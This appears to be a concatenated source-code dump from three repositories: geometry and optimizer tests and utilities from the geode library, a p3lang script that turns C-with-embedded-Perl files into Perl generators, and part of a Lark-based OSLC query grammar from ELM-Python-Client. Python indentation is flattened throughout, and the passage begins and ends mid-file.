assert relative_error(dots(centers,mesh.element_normals(X)),1)<2e-5
def test_revolution():
n = 32
alpha = linspace(-pi/2,pi/2,n)
radius = cos(alpha)
height = sin(alpha)
for c0 in 0,1:
for c1 in 0,1:
print '\nclosed = %d %d'%(c0,c1)
r = radius[c0:len(radius)-c1]
mesh,X = surface_of_revolution(base=0,axis=(0,0,1),radius=r,height=height,resolution=n,closed=(c0,c1))
assert mesh.nodes()==len(X)==n*n+(c0+c1)*(1-n)
ae = relative_error(mesh.surface_area(X),4*pi)
print 'area error = %g'%ae
assert ae<5e-3
ve = relative_error(mesh.volume(X),4*pi/3)
print 'volume error = %g'%ve
assert ve<1e-2
assert len(mesh.nonmanifold_nodes(True))==0
assert len(mesh.nonmanifold_nodes(False))==n*(2-c0-c1)
def test_grid():
mesh = grid_topology(5,7)
assert not len(mesh.nonmanifold_nodes(True))
assert len(mesh.nonmanifold_nodes(False))==2*(5+7+2)-4
def test_torus():
mesh = torus_topology(5,7)
assert not len(mesh.nonmanifold_nodes(False))
assert all(mesh.segment_soup().neighbors().sizes()==6)
def test_double_torus():
mesh = double_torus_mesh()
assert not len(mesh.nonmanifold_nodes(False))
assert all(mesh.segment_soup().neighbors().sizes()==7)
if __name__=='__main__':
test_revolution()
test_icosahedron()
test_tetrahedron()
test_sphere()
test_torus()
test_double_torus()
```
#### File: geode/geometry/test_surface_levelset.py
```python
from __future__ import division
from geode import *
from geode.geometry.platonic import *
from numpy import random
def test_surface_levelset():
random.seed(127130)
mesh,X = sphere_mesh(4)
surface = SimplexTree(mesh,X,10)
particles = ParticleTree(random.randn(1000,3),10)
print 'fast'
phi,normal,triangles,weights = surface_levelset(particles,surface,10,True)
mags,Xn = magnitudes_and_normalized(particles.X)
print 'phi range %g %g'%(phi.min(),phi.max())
# Compare with sphere distances
phi3 = mags-1
normal3 = Xn
assert absolute(phi-phi3).max() < .002
assert maxabs(absolute(dots(normal,normal3))-1) < .001
normal_error = (phi>1e-3)*magnitudes(normal-normal3)
if 1:
i = argmax(normal_error)
print 'i %d, X %s, phi %g, phi3 %g, normal %s, normal3 %s'%(i,particles.X[i],phi[i],phi3[i],normal[i],normal3[i])
e = max(normal_error)
print 'normal error =',e
assert e < .04
# Check weights
closest = particles.X-phi.reshape(-1,1)*normal
assert maxabs(magnitudes(closest)-1) < .002
closest2 = (weights.reshape(-1,3,1)*X[mesh.elements[triangles]]).sum(axis=1)
assert relative_error(closest,closest2) < 1e-7
# Compare with slow mesh distances
print 'slow'
phi2,normal2,_,_ = slow_surface_levelset(particles,surface)
if 0:
i = argmax(abs(abs(phi)-phi2))
print 'i %d, phi %g, phi2 %g'%(i,phi[i],phi2[i])
assert relative_error(abs(phi),phi2) < 1e-7
assert all(magnitudes(cross(normal,normal2))<1e-7)
```
#### File: geode/geode/__init__.py
```python
from __future__ import absolute_import
import platform
def is_windows():
return platform.system()=='Windows'
# Import geode_wrap, possibly as geode_all on windows
if is_windows():
from . import geode_all as geode_wrap
from .geode_all import *
else:
from . import geode_wrap
from .geode_wrap import *
# py.test overrides AssertionError, so make sure C++ knows about it
geode_wrap.redefine_assertion_error(AssertionError)
# Import children
from .utility import *
from .array import *
if has_exact():
from .exact import *
from .geometry import *
from .value import *
from .vector import *
from .mesh import *
real = geode_wrap.real
```
#### File: geode/math/test_hypot.py
```python
from __future__ import division,print_function
from geode import *
def test_hypot():
# On some platforms Python.h will try to #define hypot as _hypot
# Since some platforms define hypot as:
# double hypot(double a, double b) { return _hypot(a,b); }
# As a result calling hypot overflow the stack
# geode/python/config.h tries to ensure we still have a hypot function but could also break things
# We just make sure we can call hypot without a stack overflow:
assert geode_test_hypot(1.,0.) == 1.
if __name__=='__main__':
test_hypot()
```
#### File: geode/mesh/test_lower_hull.py
```python
from __future__ import division
from numpy import *
from geode import TriangleSoup, lower_hull, write_mesh
from geode.geometry.platonic import cube_mesh, icosahedron_mesh, sphere_mesh
from geode.vector import relative_error
def test_lower_hull(filename = None):
mesh,X = icosahedron_mesh()
mlh,Xlh = lower_hull(mesh, X, [0.3, 0.3, 1.0], -4., 5./180.*pi, 30./180.*pi)
if filename is not None:
write_mesh(filename+'-input.obj', mesh, X);
write_mesh(filename+'-output.obj', mlh, Xlh);
if __name__ == '__main__':
test_lower_hull("lower_hull_test")
```
#### File: geode/solver/nelder_mead.py
```python
from __future__ import division
from numpy import *
from geode.vector import *
from geode.utility import Log
def optimize_generator(x0,step0,tolerance,verbose=False):
# Initialize simplex
d = len(x0)
x = empty((d+1,d))
x[:] = asarray(x0).reshape(1,d)
for i in xrange(d):
x[i+1,i] += step0
f = empty(d+1)
for i in xrange(d+1):
f[i] = yield x[i],False
if verbose:
Log.write('nelder-mead: initialized f(%s) = %g'%(x[i],f[i]))
# Control parameters
alpha = 1.
gamma = 2.
rho = .5
sigma = .5
# Loop until convergence
while 1:
# Sort vertices in increasing order of f
p = sorted(xrange(d+1),key=lambda i:f[i])
f = f[p]
x = x[p]
if verbose:
Log.write('nelder-mead: best x = %s, f(x) = %g'%(x[0],f[0]))
Log.write('nelder-mead: worst x = %s, f(x) = %g'%(x[-1],f[-1]))
# Check if we're converged
diameter = max(magnitude(x[i]-x[j]) for i in xrange(d+1) for j in xrange(i+1,d+1))
if verbose:
Log.write('nelder-mead: diameter = %g'%diameter)
if diameter <= tolerance:
yield x[0],True
return
def replace(fn,xn):
f[-1] = fn
x[-1] = xn
# Perform reflection
xm = x[:d].mean(axis=0)
xr = xm + alpha*(xm-x[-1])
fr = yield xr,False
if f[0] <= fr <= f[-2]: # Accept reflection
if verbose:
Log.write('nelder-mead: reflected')
replace(fr,xr)
elif fr <= f[0]: # other expansion
xe = xm + gamma*(xm-x[-1])
fe = yield xe,False
if fe < fr:
if verbose:
Log.write('nelder-mead: expansion succeeded')
replace(fe,xe)
else:
if verbose:
Log.write('nelder-mead: expansion failed')
replace(fr,xr)
else: # other contraction
xc = x[-1] + rho*(xm-x[-1])
fc = yield xc,False
if fc < f[-1]:
if verbose:
Log.write('nelder-mead: contracted')
replace(fc,xc)
else: # All else failed; perform reduction
if verbose:
Log.write('nelder-mead: reduced')
for i in xrange(1,d+1):
x[i] = x[0] + sigma*(x[i]-x[0])
f[i] = yield x[i],False
def optimize(f,x0,step0,tolerance,verbose=False):
gen = optimize_generator(x0,step0,tolerance,verbose)
fx = None
while 1:
x,done = gen.send(fx)
if done:
if verbose:
print 'converged: x = %s'%x
return x
else:
fx = f(x)
if verbose:
print 'f(%s) = %g'%(x,fx)
```
#### File: geode/solver/test_min.py
```python
from __future__ import division
from geode import *
from geode.solver import nelder_mead
from numpy import *
def test_brent():
def f(x):
return x**3*(x-4)
tol = 1e-7
x,fx,it = brent(f,(-2,1,4),tol,100)
assert abs(x-3)<tol
assert abs(fx+27)<tol
def test_bracket():
random.seed(8523815)
for _ in xrange(20):
co = 5*random.randn(4)
def f(x):
return co[0]+x*(co[1]+x*(co[2]+x*(co[3]+x)))
(a,b,c),(fa,fb,fc) = bracket(f,0,.1*random.randn())
assert a<b<c
assert fb<min(fa,fc)
assert allclose(fa,f(a))
assert allclose(fb,f(b))
assert allclose(fc,f(c))
def test_powell():
evals = [0]
for tweak in 0,1/2:
def f(x):
evals[0] += 1
x,y = x
f = x*x+2*y*y+x-3*y+3 + tweak*sin(5*x)*sin(5*y)
#print 'f(%g,%g) = %g'%(x,y,f)
return f
x = zeros(2)
tol = 1e-4
fx,i = powell(f,x,.1,tol,tol,100)
print 'x = %s, fx = %g, iters = %d, evals = %d'%(x,fx,i,evals[0])
xc = (-0.87892353,0.89360935) if tweak else (-.5,.75)
fc = 1.34897 if tweak else 13/8
assert maxabs(x-xc)<2*tol
assert abs(fx-fc)<tol
def test_nelder_mead():
def f((x,y)):
return abs((3-2*x)*x-2*y+1)**(7/3) + abs((3-2*y)*y-x+1)**(7/3)
x = nelder_mead.optimize(f,(-.9,-1),.3,1e-5,verbose=1)
assert f(x) < 1e-9
if __name__=='__main__':
test_powell()
test_bracket()
test_brent()
```
#### File: geode/structure/test_heap.py
```python
from __future__ import division,print_function
from geode import *
from numpy import random
def test_heap():
random.seed(83131)
for n in xrange(30):
for m in 2,max(n//3,1),1000:
x = random.randint(m,size=n).astype(int32)
y = heapsort_test(x)
assert all(sort(x)==y)
if __name__=='__main__':
test_heap()
```
#### File: geode/utility/json_conversion.py
```python
import json
from numpy import *
from geode import *
def from_ndarray(v, typ = float):
return map(typ, v.flatten())
def from_array(v, typ = float):
return map(typ, v)
to_json_fn = {}
from_json_fn = {}
from_json_fn['int'] = lambda v: int(v)
from_json_fn['real'] = lambda v: real(v)
from_json_fn['float'] = lambda v: float(v)
from_json_fn['string'] = lambda v: str(v)
from_json_fn['bool'] = lambda v: bool(v)
from_json_fn['ndarray'] = lambda v : array(v)
from_json_fn['mat22'] = lambda v: Matrix(array(v).reshape(2, 2))
from_json_fn['mat33'] = lambda v: Matrix(array(v).reshape(3, 3))
from_json_fn['mat44'] = lambda v: Matrix(array(v).reshape(4, 4))
from_json_fn['frame2'] = lambda v: Frames(v['t'], Rotation.from_sv(array(v['r'])))
from_json_fn['frame3'] = lambda v: Frames(v['t'], Rotation.from_sv(array(v['r'])))
from_json_fn['box2'] = from_json_fn['box3'] = lambda v: Box(v['min'], v['max'])
from_json_fn['TriangleSoup'] = from_json_fn['SegmentSoup'] = lambda v: v
from_json_fn['dict'] = lambda v: v
to_json_fn[dict] = lambda v: { 't': 'dict', 'v': v }
to_json_fn[int] = lambda v: { 't': 'int', 'v': v }
to_json_fn[real] = lambda v: { 't': 'real', 'v': v }
to_json_fn[float] = lambda v: { 't': 'float', 'v': v }
to_json_fn[str] = lambda v: { 't': 'string', 'v': v }
to_json_fn[bool] = lambda v: { 't': 'bool', 'v': v }
to_json_fn[Box2d] = to_json_fn[Box3d] = lambda v: {
't': ('box%s') % len(v.min),
'v': {
'min': from_array(v.min),
'max': from_array(v.max)
}
}
to_json_fn[list] = lambda v: {
't': 'list',
'v': v # let's hope this works on the client...
}
to_json_fn[ndarray] = lambda v: {
't': 'ndarray',
'v': {
'shape': v.shape,
'data': from_ndarray(v)
}
}
to_json_fn[Matrix] = lambda v: {
't': ('mat%s%s') % (len(v), len(v[0])),
'v': from_ndarray(v)
}
to_json_fn[Frames] = lambda v: {
't': ('frame%s') % (len(v.t)),
'v': {
't': map(float, v.t),
'r': map(float, v.r.sv)
}
}
to_json_fn[TriangleSoup] = lambda v: {
't': 'TriangleSoup',
'v': from_ndarray(v.elements, int)
}
to_json_fn[SegmentSoup] = lambda v: {
't': 'SegmentSoup',
'v': from_ndarray(v.elements, int)
}
to_json_fn[MutableTriangleTopology] = lambda v: {
't': 'TriangleTopology',
'v': {
'vertices': from_ndarray(v.vertex_field(vertex_position_id)),
'elements': from_ndarray(v.elements(), int)
}
}
def to_json(v):
fn = to_json_fn.get(type(v), None)
if callable(fn):
return fn(v)
else:
raise TypeError("Don't know how to transscribe type %s to json." % type(v))
def to_json_string(v):
return json.dumps(to_json(v), allow_nan = False, separators = (',', ':'))
def from_json(d):
fn = from_json_fn.get(d['t'])
return fn(d['v']) if callable(fn) else None
def from_json_string(s):
return from_json(json.loads(s))
def register(typ, name, to_fn, from_fn):
to_json_fn[typ] = to_fn
from_json_fn[name] = from_fn
```
#### File: geode/utility/Log.py
```python
from __future__ import (with_statement,absolute_import)
from contextlib import contextmanager
import platform
if platform.system()=='Windows':
from ..import geode_all as geode_wrap
else:
from .. import geode_wrap
configure = geode_wrap.log_configure
initialized = geode_wrap.log_initialized
cache_initial_output = geode_wrap.log_cache_initial_output
copy_to_file = geode_wrap.log_copy_to_file
finish = geode_wrap.log_finish
write = geode_wrap.log_print
error = geode_wrap.log_error
flush = geode_wrap.log_flush
@contextmanager
def scope(format,*args):
geode_wrap.log_push_scope(format%args)
try:
yield
finally:
geode_wrap.log_pop_scope()
```
#### File: geode/utility/tryfile.py
```python
__all__ = 'read write pack unpack Atom'.split()
import sys
import zlib
import struct
from cStringIO import StringIO
signature = '\003TRY'
current_version = 2
nonleaf_makers = {}
nonleaf_parsers = {}
leaf_makers = {}
leaf_parsers = {}
def register_nonleaf(typename,type,maker,parser,version=0):
"""Register a nonleaf atom type.
maker(value) should return a series of (name,value) pairs, and
parser(pairs,version) should convert the given (name,value) pairs
into a value.
"""
nonleaf_makers[type] = typename,version,maker
nonleaf_parsers[typename] = type,parser
def register_leaf(typename,type,maker,parser,version=0):
"""Register a leaf atom type.
maker(value) should return a string containing the binary contents
of value, and parser(data,version) should unpack the binary string
data into a value.
"""
leaf_makers[type] = typename,version,maker
leaf_parsers[typename] = type,parser
def register_subtype(typename,type):
if typename in leaf_parsers:
leaf_makers[type] = leaf_makers[leaf_parsers[typename][0]]
elif typename in nonleaf_parsers:
nonleaf_makers[type] = nonleaf_makers[nonleaf_parsers[typename][0]]
else:
raise ValueError("atom type '%s' is not registered"%typename)
already_warned = set()
def warn_unknown(type):
if type not in already_warned:
if type in nonleaf_parsers:
raise IOError("Leaf atom has nonleaf type '%s'"%type)
elif type in leaf_parsers:
raise IOError("Nonleaf atom has leaf type '%s'"%type)
else:
print>>sys.stderr, "warning: unknown atom type '%s'"%type
already_warned.add(type)
def read_uint(file):
"""Read a uint from a file."""
result = 0
shift = 0
while True:
try:
byte = ord(file.read(1))
except TypeError:
raise EOFError
if byte&128:
result |= (byte&127)<<shift
shift += 7
else:
return result|(byte<<shift)
def uint_to_str(i):
"""Convert a uint to a string."""
s = ''
while True:
if i>127:
s += chr(i&127|128)
i >>= 7
else:
return s+chr(i)
def read_string(file):
return file.read(read_uint(file))
def string_to_str(s):
return uint_to_str(len(s))+s
def read_crc(file):
"""Read a crc32 from a file."""
return struct.unpack('<i',file.read(4))[0]
def crc_to_str(crc):
"""Convert a crc32 to a string."""
return struct.pack('<I',crc%2**32)
IsLeaf = 1
Compressed = 2
CRC = 4
FlagMask = 7
class Atom(object):
__slots__ = ['name','type','version','flags','data_size','data_crc']
def to_str(self):
return ''.join([string_to_str(self.name),string_to_str(self.type),uint_to_str(self.version),uint_to_str(self.flags)])
class Leaf(Atom):
__slots__ = ['data']
def to_str(self):
return Atom.to_str(self)+uint_to_str(self.data_size)+crc_to_str(self.data_crc)
def parse(self,file):
data = file.read(self.data_size)
if self.flags&CRC and (self.data_crc-zlib.crc32(data))%2**32:
raise IOError('data crc32 mismatch: expected %d, got %d'%(self.data_crc,zlib.crc32(data)))
if self.flags&Compressed:
data = zlib.decompress(data)
def unknown(version,data):
warn_unknown(self.type)
self.data = data
return self
_,parser = leaf_parsers.get(self.type,unknown)
return parser(data,self.version)
def write_data(self,file):
file.write(self.data)
class Nonleaf(Atom):
__slots__ = ['children']
def to_str(self):
return ''.join([Atom.to_str(self),uint_to_str(len(self.children))]+[c.to_str() for c in self.children])
def parse(self,file):
children = [(c.name,c.parse(file)) for c in self.children]
def unknown(version,children):
warn_unknown(self.type)
self.children = children
return self
_,parser = nonleaf_parsers.get(self.type,unknown)
return parser(children,self.version)
def write_data(self,file):
for c in self.children:
c.write_data(file)
def read_atom(file):
name = read_string(file)
type = read_string(file)
version = read_uint(file)
flags = read_uint(file)
if flags&~FlagMask:
raise IOError("unknown flags %d"%(flags&~FlagMask))
if flags&IsLeaf:
atom = Leaf()
atom.data_size = read_uint(file)
if flags&CRC:
atom.data_crc = read_crc(file)
else:
atom = Nonleaf()
atom.children = [read_atom(file) for _ in range(read_uint(file))]
atom.data_size = sum(a.data_size for a in atom.children)
atom.name = name
atom.type = type
atom.version = version
atom.flags = flags
return atom
def make_atom(name,value):
t = type(value)
if t in leaf_makers:
atom = Leaf()
atom.type,atom.version,maker = leaf_makers[t]
atom.data = zlib.compress(maker(value))
atom.data_size = len(atom.data)
atom.data_crc = zlib.crc32(atom.data)
atom.flags = IsLeaf|Compressed|CRC
elif t in nonleaf_makers:
atom = Nonleaf()
atom.type,atom.version,maker = nonleaf_makers[t]
atom.children = [make_atom(*p) for p in maker(value)]
atom.data_size = sum(c.data_size for c in atom.children)
atom.flags = 0
else:
raise TypeError("can't convert unregistered type '%s' to atom"%t.__name__)
atom.name = name
return atom
def read_stream(file):
'''Read a .try file from an open stream.'''
if file.read(4)!=signature:
raise IOError('bad signature')
header_size = read_uint(file)
header_start = file.tell()
version = read_uint(file)
if not 1<=version<=2:
raise IOError('unknown version %d'%version)
tree_size = read_uint(file)
data_size = read_uint(file)
if version>1:
tree_crc = read_crc(file)
if header_size<file.tell()-header_start:
raise IOError('header_size smaller than header')
tree_start = header_start+header_size
file.seek(tree_start) # Skip over the rest of the header
# Read atom tree. This reads and parses the entire atom hierarchy, but does not parse the leaf data.
tree = file.read(tree_size)
tree_file = StringIO(tree)
try:
atom = read_atom(tree_file)
except EOFError:
raise IOError('unexpected end of tree section, size %d is too small'%tree_size)
if version>1 and (tree_crc-zlib.crc32(tree))%2**32:
raise IOError('tree crc32 mismatch: expected %d, got %d'%(tree_crc,zlib.crc32(tree)))
if tree_file.tell()!=tree_size:
raise IOError('expected tree size %d, got %d'%(tree_size,tree_file.tell()))
data_start=file.tell()
# Read data section by traversing the atom tree.
result = atom.parse(file)
data_end = file.tell()
if data_end-data_start!=data_size:
raise IOError('expected data size %d, got %d'%(data_size,data_end-data_start))
return result
def write_stream(file,value):
'''Write a .try file to an open stream.'''
# Build atom tree in memory
atom = make_atom('',value)
tree = atom.to_str()
# Write header
file.write(signature)
tree_size = len(tree)
data_size = atom.data_size
tree_crc = zlib.crc32(tree)
header = ''.join(uint_to_str(i) for i in (current_version,tree_size,data_size))+crc_to_str(tree_crc)
file.write(string_to_str(header))
# Write tree
file.write(tree)
# Write data
atom.write_data(file)
def read(filename):
'''Read the contents of a .try file in its entirety.
Return (name,data), where data is the parsed contents of the
toplevel tree atom. The mapping from atom data to python types
is dict to dict, array to array, as one would expect. Unknown
atom types are parsed into Atom.'''
return read_stream(open(filename,'rb'))
def write(filename,value):
'''Write a new .try file in its entirety.
Data must be a nested tree of dictionaries with scalars or numpy
arrays as leaves.'''
write_stream(open(filename,'wb'),value)
def unpack(buffer):
'''Unpack a string in .try format into data.'''
return read_stream(StringIO(buffer))
def pack(value):
'''Pack data into a .try format string.'''
file = StringIO()
write_stream(file,value)
return file.getvalue()
### Dict
def parse_dict(pairs,version):
return dict(pairs)
register_nonleaf('dict',dict,dict.iteritems,parse_dict)
### Array
import numpy
# Start dtype map off with platform independent dtypes only
int_to_dtype = map(numpy.dtype,'bool int8 uint8 int16 uint16 int32 uint32 int64 uint64 float32 float64'.split())
dtype_num_to_int = dict((d.num,i) for i,d in enumerate(int_to_dtype))
def make_array(a):
a = numpy.asarray(a)
try:
dtype = dtype_num_to_int[a.dtype.num]
except KeyError:
# dtype isn't correctly hashable, so do linear search for matching dtype
for i,d in enumerate(int_to_dtype):
if a.dtype==d:
dtype = dtype_num_to_int[a.dtype.num]=dtype_num_to_int[d.num]
break
else:
raise TypeError("unregistered dtype '%s'"%a.dtype)
# Convert numpy array to little endian buffer, flipping endianness if necessary
return ''.join([uint_to_str(i) for i in (dtype,len(a.shape))+a.shape]+[a.astype(a.dtype.newbyteorder('<')).tostring()])
def parse_array(data,version):
file = StringIO(data)
dtype = int_to_dtype[read_uint(file)]
rank = read_uint(file)
shape = [read_uint(file) for _ in xrange(rank)]
# Convert little endian buffer to a numpy array, flipping endianness if necessary
array = (numpy.frombuffer(data,dtype=dtype.newbyteorder('<'),offset=file.tell()).astype(dtype) if numpy.product(shape) else numpy.empty(0,dtype)).reshape(shape)
return numpy.require(array,requirements='a')
register_leaf('array',numpy.ndarray,make_array,parse_array)
for t in int,bool,float,numpy.int32,numpy.int64,numpy.float32,numpy.float64:
register_subtype('array',t)
### Str
register_leaf('str',str,str,lambda s,v:s)
### Tuple and List
def tuple_maker(x):
return ((str(i),y) for i,y in enumerate(x))
def parse_tuple(pairs,version):
x = []
for i,(n,y) in enumerate(pairs):
assert i==int(n)
x.append(y)
return tuple(x)
register_nonleaf('list',list,tuple_maker,parse_tuple)
register_nonleaf('tuple',tuple,tuple_maker,parse_tuple)
```
#### File: geode/value/__init__.py
```python
from __future__ import absolute_import
from geode import *
from . import parser
import types
def is_value(value):
return isinstance(value, Value)
def is_prop(prop):
return is_value(prop) and prop.is_prop()
def const_value(value, name=""):
return const_value_py(value, name)
def Prop(name,default,shape=None):
if shape is None:
return make_prop(name,default)
return make_prop_shape(name,default,shape)
class cache_method(object):
'''Decorator to cache a class method per instance. The equivalent of 'cache' in the function case.'''
def __init__(self,f):
self._name = '__'+f.__name__
self.f = f
def __get__(self,instance,owner):
try:
return getattr(instance,self._name)
except AttributeError:
if type(instance)==types.InstanceType:
raise TypeError('cache_method can only be used on new-style classes (must inherit from object)')
value = cache(types.MethodType(self.f,instance,owner))
object.__setattr__(instance,self._name,value)
return value
def cache_named(name):
def inner(f):
return cache_named_inner(f, name)
return inner
```
#### File: geode/vector/test_register.py
```python
from geode.vector import *
from numpy import *
def test_register():
random.seed(217301)
for _ in xrange(10):
for d in 2,3:
X0 = random.randn(10,d)
t = random.randn(d)
A = random.randn(d,d)
r,_ = linalg.qr(A)
if linalg.det(r)<0:
r[0] = -r[0]
X1 = t + Matrix(r)*X0
X2 = t + Matrix(A)*X0
f = rigid_register(X0,X1)
B = affine_register(X0,X2)
assert relative_error(t,f.t) < 1e-5
assert relative_error(r,f.r.matrix()) < 1e-5
assert relative_error(t,B[:d,d]) < 1e-5
assert relative_error(A,B[:d,:d]) < 1e-5
assert all(B[d]==hstack([zeros(d),1]))
``` |
{
"source": "jjravi/p3lang",
"score": 3
} |
#### File: jjravi/p3lang/cperlcompile.py
```python
import re
import os
import sys
import argparse
class CPerlCompile():
def __init__(self):
self.output_file_lines = []
self.output_file_lines.append("#!/usr/bin/perl\n")
self.output_file_lines.append("use warnings;\n")
self.output_file_lines.append("use strict;\n")
self.output_file_lines.append("\n")
self.output_file_lines.append("my $argv1 = $ARGV[0];\n")
self.output_file_lines.append("my $gen_file_buffer = <<END_C_CODE;\n")
def get_command_line_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('-i', dest='input_path',
help='REQUIRED: The p3lang file',
required=True)
parser.add_argument('-o', dest='output_file_name',
help='Rename the output to <input>.c',
nargs='?', type=str, default=None, required=False)
self.args = parser.parse_args()
#self.rcPath = self.args.input_path
#if self.args.output_file_name is not None:
# self.outputFileName = self.args.output_file_name
return parser.parse_args()
def should_i_output(self, line):
if "# vim: set filetype=c:" in line:
return False
if line.strip().startswith("{."):
return False
if line.strip().startswith(".}"):
return False
return True
def parse_p3lang_file(self, verbose=False):
self.add_signal_dict = {}
print(": Opening: ", self.args.input_path)
add_signal_list = []
inside_perl_script = False
with open(self.args.input_path, 'r') as file_object:
for line in file_object:
if line.strip().startswith("{."):
self.output_file_lines.append("@{[eval{\n")
inside_perl_script = True
if line.strip().startswith(".}"):
self.output_file_lines.append("}]}\n")
inside_perl_script = False
if self.should_i_output(line):
# re.sub(r'(\n+)(?=[A-Z])', r'\\n', line)
if not inside_perl_script:
line = re.sub(r'([\\n]+)(\")', r'\\\\n"', line)
self.output_file_lines.append(line)
self.output_file_lines.append("END_C_CODE\n")
self.output_file_lines.append("# make sure the file is called: file.c.p3\n")
self.output_file_lines.append("# file.c.p3 -> file.c\n")
self.output_file_lines.append("my $foo = substr($0, 0, -3);\n")
self.output_file_lines.append("open (OUT, \">$foo\") or die \"Unable to open $foo for writing:$!\\n\";\n")
self.output_file_lines.append("binmode OUT;\n")
self.output_file_lines.append("print OUT $gen_file_buffer;\n")
self.output_file_lines.append("close OUT;\n")
self.output_file_lines.append("__END__\n")
self.output_file_lines.append("\n")
#print(line, end="")
return self.add_signal_dict
def save_expanded_file(self):
with open(self.args.output_file_name, 'w', newline='') as outfile:
# outfile.write("rc_path,full_signal_path,\n")
for line in self.output_file_lines:
outfile.write(line)
# outfile.write("%s,%s,\n"%(key, signal_path))
if __name__ == '__main__':
CPerlCompile_inst = CPerlCompile()
print("Starting")
CPerlCompile_inst.get_command_line_args()
# CPerlCompile_inst.get_rc_path_list()
CPerlCompile_inst.parse_p3lang_file()
# CPerlCompile_inst.build_full_signal_path_dict()
CPerlCompile_inst.save_expanded_file()
print("Finished, exiting now.")
``` |
{
"source": "jjrevuel/ELM-Python-Client",
"score": 2
} |
#### File: ELM-Python-Client/elmclient/_queryparser.py
```python
import logging
import re
import lark
import lxml.etree as ET
from . import rdfxml
logger = logging.getLogger(__name__)
#
# This enhanced OSLC Query grammar supports "||", "&&" and bracketed evaluation
# This is based on the EBNF in OSLC Query 3.0 standard https://tools.oasis-open.org/version-control/browse/wsvn/oslc-core/trunk/specs/oslc-query.html
# Differences/enhancements from the OSLC 3.0 definition:
# You can combine compound_terms using && and || - note when using these the compound_term MUST be in ( ) (which also makes reading the expression easier)
# also accepts just a single compound_term with no ( ) needed (i.e. this is basically the vanilla OSLC Query 3.0 syntax)
# In order to allow the user to use friendly names for attributes and enumeration values, there is a new terminal valueidentifier - these are resolved in the context of the identifier (attribute) in the LHS of the term - a name with a space must be surrounded by ' '
# You are of course free to use <https://...> URIs for identifiers and value identifiers. Good luck with that!
# identifiers and valueidentifiers must start with [a-zA-Z0-9_]
# Identifiers can't use backslash escapes
# langtag can be used but will be ignored
# ^^ type-specifiers can be used and will be passed on into the query, but not checked/enforced
# In order to allow the user to use names with spaces (e.g. an enumeration value 'In Process'), put ' ' around them
# Won't resolve identifiers or valueidentifiers if they include a : (can't tell the difference between that usage and e.g. dcterms:identifier)
# DNG 6.0.6.1 doesn't support the Query 3.0 PrefixedName on RHS of a term as a value, so they are all converted to <https://...> references
# For DNG You can refer to a foldername using e.g. $"folder name" - this gets converted to the URI of the folder in <> NOT EXTENSIVELY TESTED!
# You can refer to a user name using e.g. @"user name" - this gets converted to the server-specific URI of the user
_core_oslc_grammar = """
?compound_term : simple_term
| simple_term boolean_op compound_term -> do_oslcand
boolean_op : "and"
?simple_term : term
| scoped_term
?scoped_term : identifier_wc "{" compound_term "}"
term : identifier_wc comparison_op value
| identifier_wc inop in_val
inop : "in"
in_val : "[" invalue ("," invalue)* "]"
invalue : value
| "*" unsignedinteger -> reqid_to_module_uris
?identifier_wc : identifier | WILDCARD
identifier : dottedname
| prefixedname
| simpleidentifier
dottedname : ( URI_REF_ESC | NAME | "'"SPACYNAME "'" ) "." ( NAME | "'" SPACYNAME "'" )
prefixedname : ( URI_REF_ESC | NAME ) ":" NAME
simpleidentifier : ( NAME | "'" SPACYNAME "'" )
NAME : /[a-zA-Z0-9_]\w*/
value : URI_REF_ESC
| boolean
| decimal
| typedliteralstring
| literalstring
| valueidentifier
| urioffoldername
| uriofuser
| uriofmodule
valueidentifier : ( ( URI_REF_ESC | NAME | "'" SPACYNAME "'" ) ":" )? NAME
| "'" SPACYNAME "'"
| "~" unsignedinteger -> reqid_to_core_uri
unsignedinteger : /[1-9][0-9]*/
URI_REF_ESC : /<https?:.*?>/
SPACYNAME : /[a-zA-Z0-9_][^']*/
urioffoldername : "$" string_esc
uriofuser : "@" string_esc
uriofmodule : "^" string_esc
typedliteralstring : string_esc (langtag | ("^^" prefixedname))
literalstring : string_esc
boolean : TRUE | FALSE
WILDCARD : "*"
comparison_op : EQ
| NE
| LT
| GT
| LE
| GE
EQ: "="
NE: "!="
LT: "<"
LE: "<="
GE: ">="
GT: ">"
TRUE : "true"
FALSE : "false"
decimal : SIGNED_NUMBER
newstring_esc : "'" /[^']+/ "'"
string_esc : ESCAPED_STRING
langtag : /@[a-z][a-z0-9_]*/
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
"""
_enhanced_oslc3_query_grammar = """
where_expression : compound_term
| logicalor_term
?logicalor_term : logicalcompound_term
| logicalcompound_term ( "||" logicalcompound_term )+ -> do_logicalor
?logicalcompound_term : "(" ( compound_term | logicalor_term ) ")"
| "(" ( compound_term | logicalor_term ) ")" ("&&" logicalcompound_term)+ -> do_logicaland
""" + _core_oslc_grammar
# The basic grammer removes logicalorterm and logicalandterm
_basic_oslc3_query_grammar = """
where_expression : compound_term
""" + _core_oslc_grammar
# This class will turn a parsed query into a list of steps each (identifier,operation,value) - corresponding to an OSLC query compound_term
# and these lists are combined with the enhanced operations for logicalor and logicaland
# the idea is that results from OSLC query compound_terms are pushed on a stack, and the the logicalor and logicaland take the top
# two entries in the stack and push one result back on the stack.
# The stack will end up with one entry - the results - this is assured by the parsing because it won't generate anything else on a valid enhanced query string
# the transformer does things like turning identifiers (which are human-friendly names) into URIs using nameresolver, and
# turning valueidentifier which are friendly enumeration value names into <URI> (this is done in the term() method)
# while doing this it updates the mapping dictionaries so the results
# can use them to turn result URIs back into friendly names
# leafs of the tree are called first, returning results upwards
class _ParseTreeToOSLCQuery(lark.visitors.Transformer):
def __init__(self,resolverobject):
super().__init__()
self.resolverobject = resolverobject
self.mapping_uri_to_identifer = {}
self.mapping_identifer_to_uri = {}
self.mapping_folders = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
self.mapping_users = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
self.mapping_modules = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
self.mapping_projects = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
def where_expression(self, s):
logger.debug( f"where_expression {s=}" )
result = s
logger.debug( f"where_expression {s=} returning {result=}" )
return s
def do_logicalor(self, s):
if len(s) == 1:
result = s[0]
else:
if isinstance(s[0][0], str):
res0 = [s[0]]
else:
res0 = s[0]
if isinstance(s[1][0], str):
res1 = [s[1]]
else:
res1 = s[1]
result = [res0, res1, "logicalor"]
return result
def do_logicaland(self, s):
if len(s) == 1:
result = s[0]
else:
if isinstance(s[0][0], str):
res0 = [s[0]]
else:
res0 = s[0]
